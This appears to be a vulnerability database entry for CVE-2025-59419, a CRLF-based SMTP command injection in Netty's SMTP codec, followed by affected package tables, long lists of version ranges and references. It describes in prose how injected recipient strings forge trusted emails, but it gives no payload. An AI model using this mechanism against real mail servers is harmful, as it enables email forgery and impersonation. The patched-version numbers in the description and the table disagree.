CVE-2025-59419
Description
Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.128.Final and 4.2.7.Final, the SMTP codec in Netty contains an SMTP command injection vulnerability due to insufficient input validation for Carriage Return (\r) and Line Feed (\n) characters in user-supplied parameters. The vulnerability exists in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string without sanitization. When methods such as SmtpRequests.rcpt(recipient) are called with a malicious string containing CRLF sequences, attackers can inject arbitrary SMTP commands. Because the injected commands are sent from the server's trusted IP address, resulting emails will likely pass SPF and DKIM authentication checks, making them appear legitimate. This allows remote attackers who can control SMTP command parameters (such as email recipients) to forge arbitrary emails from the trusted server, potentially impersonating executives and forging high-stakes corporate communications. This issue has been patched in versions 4.1.129.Final and 4.2.8.Final. No known workarounds exist.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
io.netty:netty-codec-smtpMaven | >= 4.2.0.Alpha1, < 4.2.7.Final | 4.2.7.Final |
io.netty:netty-codec-smtpMaven | < 4.1.128.Final | 4.1.128.Final |
Affected products
186- osv-coords185 versionspkg:apk/chainguard/apache-hoppkg:apk/chainguard/apache-hop-fipspkg:apk/chainguard/celeborn-0.5pkg:apk/chainguard/celeborn-0.5-compatpkg:apk/chainguard/celeborn-0.6pkg:apk/chainguard/hadoop-fips-3.3.6pkg:apk/chainguard/hadoop-fips-3.3.6-compatpkg:apk/chainguard/hadoop-fips-3.3.6-devpkg:apk/chainguard/hadoop-fips-3.3.6-m2pkg:apk/chainguard/management-api-for-apache-cassandra-4.0pkg:apk/chainguard/management-api-for-apache-cassandra-4.0-compatpkg:apk/chainguard/management-api-for-apache-cassandra-4.1pkg:apk/chainguard/management-api-for-apache-cassandra-4.1-compatpkg:apk/chainguard/management-api-for-apache-cassandra-5.0pkg:apk/chainguard/management-api-for-apache-cassandra-5.0-compatpkg:apk/chainguard/pinot-fipspkg:apk/chainguard/seatapkg:apk/chainguard/seata-namingserverpkg:apk/chainguard/seata-namingserver-oci-entrypointpkg:apk/chainguard/seata-openjdk-17-compatpkg:apk/chainguard/seata-openjdk-21-compatpkg:apk/chainguard/seata-openjdk-8-compatpkg:apk/chainguard/seata-serverpkg:apk/chainguard/seata-server-oci-entrypointpkg:apk/chainguard/tezpkg:apk/chainguard/thingsboardpkg:apk/chainguard/thingsboard-tb-js-executorpkg:apk/chainguard/thingsboard-tb-mqtt-transportpkg:apk/chainguard/thingsboard-tb-nodepkg:apk/chainguard/thingsboard-tb-web-uipkg:apk/chainguard/trinopkg:apk/chainguard/trino-configpkg:apk/chainguard/trino-oci-entrypointpkg:apk/chainguard/trino-plugin-accumulopkg:apk/chainguard/trino-plugin-ai-functionspkg:apk/chainguard/trino-plugin-atoppkg:apk/chainguard/trino-plugin-bigquerypkg:apk/chainguard/trino-plugin-blackholepkg:apk/chainguard/trino-plugin-cassandrapkg:apk/chainguard/trino-plugin-clickhousepkg:apk/chainguard/trino-plugin-delta-lakepkg:apk/chainguard/trino-plugin-druidpkg:apk/chainguard/trino-plugin-duckdbpkg:apk/chainguard/trino-plugin-elasticsearchpkg:apk/chainguard/trino-plugin-example-httppkg:apk/chainguard/trino-plugin-exasolpkg:apk/chainguard/trino-plugin-exchange-filesystempkg:apk/chainguard/trino-plugin-exchange-hdfspkg:apk/chainguard/trino-plugin-fakerpkg:apk/chainguard/trino-plugin-functions-pythonpkg:apk/chainguard/trino-plugin-geospatialpkg:apk/chainguard/trino-plugin-google-sheetspkg:apk/chainguard/trino-plugin-hivepkg:apk/chainguard/trino-plugin-http-event-listenerpkg:apk/chainguard/trino-plugin-http-server-event-listenerpkg:apk/chainguard/trino-plugin-hudipkg:apk/chainguard/trino-plugin-icebergpkg:apk/chainguard/trino-plugin-ignitepkg:apk/chainguard/trino-plugin-jmxpkg:apk/chainguard/trino-plugin-kafkapkg:apk/chainguard/trino-plugin-kafka-event-listenerpkg:apk/chainguard/trino-plugin-kinesispkg:apk/chainguard/trino-plugin-kudupkg:apk/chainguard/trino-plugin-lakehousepkg:apk/chainguard/trino-plugin-ldap-group-providerpkg:apk/chainguard/trino-plugin-local-filepkg:apk/chainguard/trino-plugin-lokipkg:apk/chainguard/trino-plugin-mariadbpkg:apk/chainguard/trino-plugin-memorypkg:apk/chainguard/trino-plugin-mlpkg:apk/chainguard/trino-plugin-mongodbpkg:apk/chainguard/trino-plugin-mysqlpkg:apk/chainguard/trino-plugin-mysql-event-listenerpkg:apk/chainguard/trino-plugin-opapkg:apk/chainguard/trino-plugin-openlineagepkg:apk/chainguard/trino-plugin-opensearchpkg:apk/chainguard/trino-plugin-oraclepkg:apk/chainguard/trino-plugin-password-authenticatorspkg:apk/chainguard/trino-plugin-phoenix5pkg:apk/chainguard/trino-plugin-pinotpkg:apk/chainguard/trino-plugin-postgresqlpkg:apk/chainguard/trino-plugin-prometheuspkg:apk/chainguard/trino-plugin-rangerpkg:apk/chainguard/trino-plugin-raptor-legacypkg:apk/chainguard/trino-plugin-redispkg:apk/chainguard/trino-plugin-redshiftpkg:apk/chainguard/trino-plugin-resource-group-managerspkg:apk/chainguard/trino-plugin-session-property-managerspkg:apk/chainguard/trino-plugin-singlestorepkg:apk/chainguard/trino-plugin-snowflakepkg:apk/chainguard/trino-plugin-spooling-filesystempkg:apk/chainguard/trino-plugin-sqlserverpkg:apk/chainguard/trino-plugin-teradata-functionspkg:apk/chainguard/trino-plugin-thriftpkg:apk/chainguard/trino-plugin-tpcdspkg:apk/chainguard/trino-plugin-tpchpkg:apk/chainguard/trino-plugin-verticapkg:apk/wolfi/celeborn-0.5pkg:apk/wolfi/celeborn-0.5-compatpkg:apk/wolfi/celeborn-0.6pkg:apk/wolfi/management-api-for-apache-cassandra-4.1pkg:apk/wolfi/management-api-for-apache-cassandra-4.1-compatpkg:apk/wolfi/management-api-for-apache-cassandra-5.0pkg:apk/wolfi/management-api-for-apache-cassandra-5.0-compatpkg:apk/wolfi/tezpkg:apk/wolfi/thingsboardpkg:apk/wolfi/thingsboard-tb-js-executorpkg:apk/wolfi/thingsboard-tb-mqtt-transportpkg:apk/wolfi/thingsboard-tb-nodepkg:apk/wolfi/thingsboard-tb-web-uipkg:apk/wolfi/trinopkg:apk/wolfi/trino-configpkg:apk/wolfi/trino-oci-entrypointpkg:apk/wolfi/trino-plugin-accumulopkg:apk/wolfi/trino-plugin-ai-functionspkg:apk/wolfi/trino-plugin-atoppkg:apk/wolfi/trino-plugin-bigquerypkg:apk/wolfi/trino-plugin-blackholepkg:apk/wolfi/trino-plugin-cassandrapkg:apk/wolfi/trino-plugin-clickhousepkg:apk/wolfi/trino-plugin-delta-lakepkg:apk/wolfi/trino-plugin-druidpkg:apk/wolfi/trino-plugin-duckdbpkg:apk/wolfi/trino-plugin-elasticsearchpkg:apk/wolfi/trino-plugin-example-httppkg:apk/wolfi/trino-plugin-exasolpkg:apk/wolfi/trino-plugin-exchange-filesystempkg:apk/wolfi/trino-plugin-exchange-hdfspkg:apk/wolfi/trino-plugin-fakerpkg:apk/wolfi/trino-plugin-functions-pythonpkg:apk/wolfi/trino-plugin-geospatialpkg:apk/wolfi/trino-plugin-google-sheetspkg:apk/wolfi/trino-plugin-hivepkg:apk/wolfi/trino-plugin-http-event-listenerpkg:apk/wolfi/trino-plugin-http-server-event-listenerpkg:apk/wolfi/trino-plugin-hudipkg:apk/wolfi/trino-plugin-icebergpkg:apk/wolfi/trino-plugin-ignitepkg:apk/wolfi/trino-plugin-jmxpkg:apk/wolfi/trino-plugin-kafkapkg:apk/wolfi/trino-plugin-kafka-event-listenerpkg:apk/wolfi/trino-plugin-kinesispkg:apk/wolfi/trino-plugin-kudupkg:apk/wolfi/trino-plugin-lakehousepkg:apk/wolfi/trino-plugin-ldap-group-providerpkg:apk/wolfi/trino-plugin-local-filepkg:apk/wolfi/trino-plugin-lokipkg:apk/wolfi/trino-plugin-mariadbpkg:apk/wolfi/trino-plugin-memorypkg:apk/wolfi/trino-plugin-mlpkg:apk/wolfi/trino-plugin-mongodbpkg:apk/wolfi/trino-plugin-mysqlpkg:apk/wolfi/trino-plugin-mysql-event-listenerpkg:apk/wolfi/trino-plugin-opapkg:apk/wolfi/trino-plugin-openlineagepkg:apk/wolfi/trino-plugin-opensearchpkg:apk/wolfi/trino-plugin-oraclepkg:apk/wolfi/trino-plugin-password-authenticatorspkg:apk/wolfi/trino-plugin-phoenix5pkg:apk/wolfi/trino-plugin-pinotpkg:apk/wolfi/trino-plugin-postgresqlpkg:apk/wolfi/trino-plugin-prometheuspkg:apk/wolfi/trino-plugin-rangerpkg:apk/wolfi/trino-plugin-raptor-legacypkg:apk/wolfi/trino-plugin-redispkg:apk/wolfi/trino-plugin-redshiftpkg:apk/wolfi/trino-plugin-resource-group-managerspkg:apk/wolfi/trino-plugin-session-property-managerspkg:apk/wolfi/trino-plugin-singlestorepkg:apk/wolfi/trino-plugin-snowflakepkg:apk/wolfi/trino-plugin-spooling-filesystempkg:apk/wolfi/trino-plugin-sqlserverpkg:apk/wolfi/trino-plugin-teradata-functionspkg:apk/wolfi/trino-plugin-thriftpkg:apk/wolfi/trino-plugin-tpcdspkg:apk/wolfi/trino-plugin-tpchpkg:apk/wolfi/trino-plugin-verticapkg:maven/io.netty/netty-codec-smtppkg:rpm/opensuse/netty&distro=openSUSE%20Leap%2015.6pkg:rpm/opensuse/netty&distro=openSUSE%20Tumbleweedpkg:rpm/opensuse/netty-tcnative&distro=openSUSE%20Leap%2015.6pkg:rpm/suse/netty&distro=SUSE%20Linux%20Enterprise%20Module%20for%20Package%20Hub%2015%20SP6pkg:rpm/suse/netty&distro=SUSE%20Linux%20Enterprise%20Module%20for%20Package%20Hub%2015%20SP7pkg:rpm/suse/netty-tcnative&distro=SUSE%20Linux%20Enterprise%20Module%20for%20Development%20Tools%2015%20SP6pkg:rpm/suse/netty-tcnative&distro=SUSE%20Linux%20Enterprise%20Module%20for%20Development%20Tools%2015%20SP7
< 2.15.0-r13+ 184 more
- (no CPE)range: < 2.15.0-r13
- (no CPE)range: < 2.15.0-r15
- (no CPE)range: < 0.5.4-r8
- (no CPE)range: < 0.5.4-r8
- (no CPE)range: < 0.6.3-r7
- (no CPE)range: < 3.3.6-r13
- (no CPE)range: < 3.3.6-r13
- (no CPE)range: < 3.3.6-r13
- (no CPE)range: < 3.3.6-r13
- (no CPE)range: < 0.1.108-r1
- (no CPE)range: < 0.1.108-r1
- (no CPE)range: < 0.1.108-r1
- (no CPE)range: < 0.1.108-r1
- (no CPE)range: < 0.1.108-r2
- (no CPE)range: < 0.1.108-r2
- (no CPE)range: < 1.5.0-r9
- (no CPE)range: < 2.5.0-r1
- (no CPE)range: < 2.5.0-r1
- (no CPE)range: < 2.5.0-r1
- (no CPE)range: < 2.5.0-r1
- (no CPE)range: < 2.5.0-r1
- (no CPE)range: < 2.5.0-r1
- (no CPE)range: < 2.5.0-r1
- (no CPE)range: < 2.5.0-r1
- (no CPE)range: < 0.10.5-r6
- (no CPE)range: < 4.2.1-r1
- (no CPE)range: < 4.2.1-r1
- (no CPE)range: < 4.2.1-r1
- (no CPE)range: < 4.2.1-r1
- (no CPE)range: < 4.2.1-r1
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 0.5.4-r8
- (no CPE)range: < 0.5.4-r8
- (no CPE)range: < 0.6.3-r7
- (no CPE)range: < 0.1.108-r1
- (no CPE)range: < 0.1.108-r1
- (no CPE)range: < 0.1.108-r2
- (no CPE)range: < 0.1.108-r2
- (no CPE)range: < 0.10.5-r6
- (no CPE)range: < 4.2.1-r1
- (no CPE)range: < 4.2.1-r1
- (no CPE)range: < 4.2.1-r1
- (no CPE)range: < 4.2.1-r1
- (no CPE)range: < 4.2.1-r1
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: < 477-r2
- (no CPE)range: >= 4.2.0.Alpha1, < 4.2.7.Final
- (no CPE)range: < 4.1.128-150200.4.37.1
- (no CPE)range: < 4.1.128-1.1
- (no CPE)range: < 2.0.74-150200.3.33.1
- (no CPE)range: < 4.1.128-150200.4.37.1
- (no CPE)range: < 4.1.128-150200.4.37.1
- (no CPE)range: < 2.0.74-150200.3.33.1
- (no CPE)range: < 2.0.74-150200.3.33.1
Patches
Vulnerability mechanics
References
7- github.com/advisories/GHSA-jq43-27x9-3v86ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2025-59419ghsaADVISORY
- gist.github.com/DepthFirstDisclosures/ddacca28cb94b48fa8ab998cef59ed8cghsaWEB
- github.com/netty/netty/commit/1782e8c2060a244c4d4e6f9d9112d5517ca05120nvdWEB
- github.com/netty/netty/commit/2b3fddd3339cde1601f622b9ce5e54c39f24c3f9ghsaWEB
- github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86nvdWEB
- www.depthfirst.com/post/our-ai-agent-found-a-netty-zero-day-that-bypasses-email-authentication-the-story-of-cve-2025-59419nvdWEB
News mentions
0No linked articles in our index yet.